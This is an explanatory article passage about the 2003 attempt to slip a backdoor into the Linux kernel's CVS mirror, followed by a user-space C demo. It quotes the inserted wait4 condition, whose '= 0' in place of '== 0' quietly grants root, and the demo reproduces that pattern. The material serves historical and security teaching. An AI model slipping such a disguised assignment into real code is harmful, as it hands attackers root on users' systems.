Ed Felten writes about an incident, in 2003, in which someone tried to backdoor the Linux kernel. Back in 2003 Linux used BitKeeper
to store the master copy of the Linux source code. If a developer
wanted to propose a modification to the Linux code, they would submit
their proposed change, and it would go through an organized approval
process to decide whether the change would be accepted into the master
code. But some people didn't like BitKeeper,
so a second copy of the source code was kept in CVS. On November 5,
2003, Larry McVoy noticed that there was a code change in the CVS copy
that did not have a pointer to a record of approval. Investigation
showed that the change had never been approved and, stranger yet, that
this change did not appear in the primary BitKeeper repository at all.
Further investigation determined that someone had apparently broken in
electronically to the CVS server and inserted a small change to wait4: 'if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) ...'
A casual reading makes it look like innocuous error-checking code, but
a careful reader would notice that, near the end of the first line, it
said '= 0' rather than '== 0', so the effect of this
code is to give root privileges to any piece of software that called
wait4 in a particular way that is supposed to be invalid. In other words
it's a classic backdoor. We don't know who it was that made the
attempt—and we probably never will. But the attempt didn't work, because
the Linux team was careful enough to notice that this code was in
the CVS repository without having gone through the normal approval
process. 'Could this have been an NSA attack? Maybe. But there were many
others who had the skill and motivation to carry out this attack,'
writes Felten. 'Unless somebody confesses, or a smoking-gun document
turns up, we'll never know.'
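
The effect of the one-character difference, as an added example that is not part of the original article or of the kernel source: a user-space C mock that runs the quoted condition and its '==' form against the same unprivileged caller. The struct task type, the DEMO_ flag values, the helper names and the starting uid of 1000 are assumptions made for the demo.

```c
#include <stdio.h>

/* Stand-ins for the kernel's __WCLONE and __WALL; values are for the demo only. */
#define DEMO_WCLONE 0x80000000u
#define DEMO_WALL   0x40000000u

/* Minimal mock of the calling task; the real kernel structure is far larger. */
struct task { unsigned int uid; };

/* Condition as quoted in the article: '=' stores 0 into uid. The stored value
 * (0) is false, so the branch body never runs and nothing visible happens.
 * The extra parentheses also keep gcc's -Wparentheses warning quiet.
 * Returns 1 if the branch would be taken. */
static int check_backdoored(struct task *current, unsigned int options)
{
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid = 0))
        return 1;
    return 0;
}

/* The comparison a reviewer would expect: reads uid, never writes it. */
static int check_compare(struct task *current, unsigned int options)
{
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid == 0))
        return 1;
    return 0;
}

/* Run one variant as an unprivileged caller and report the uid afterwards. */
static unsigned int uid_after(int (*check)(struct task *, unsigned int),
                              unsigned int options, int *taken)
{
    struct task t = { 1000 };   /* constructed, non-root caller */
    *taken = check(&t, options);
    return t.uid;
}

int main(void)
{
    int taken;
    unsigned int uid = uid_after(check_backdoored, DEMO_WCLONE | DEMO_WALL, &taken);
    printf("'=' form:  uid after call = %u, branch taken = %d\n", uid, taken);
    uid = uid_after(check_compare, DEMO_WCLONE | DEMO_WALL, &taken);
    printf("'==' form: uid after call = %u, branch taken = %d\n", uid, taken);
    return 0;
}
```

Because the first operand short-circuits, the assignment only executes for the one flag combination, which is why the line reads like a dead error check for every other caller.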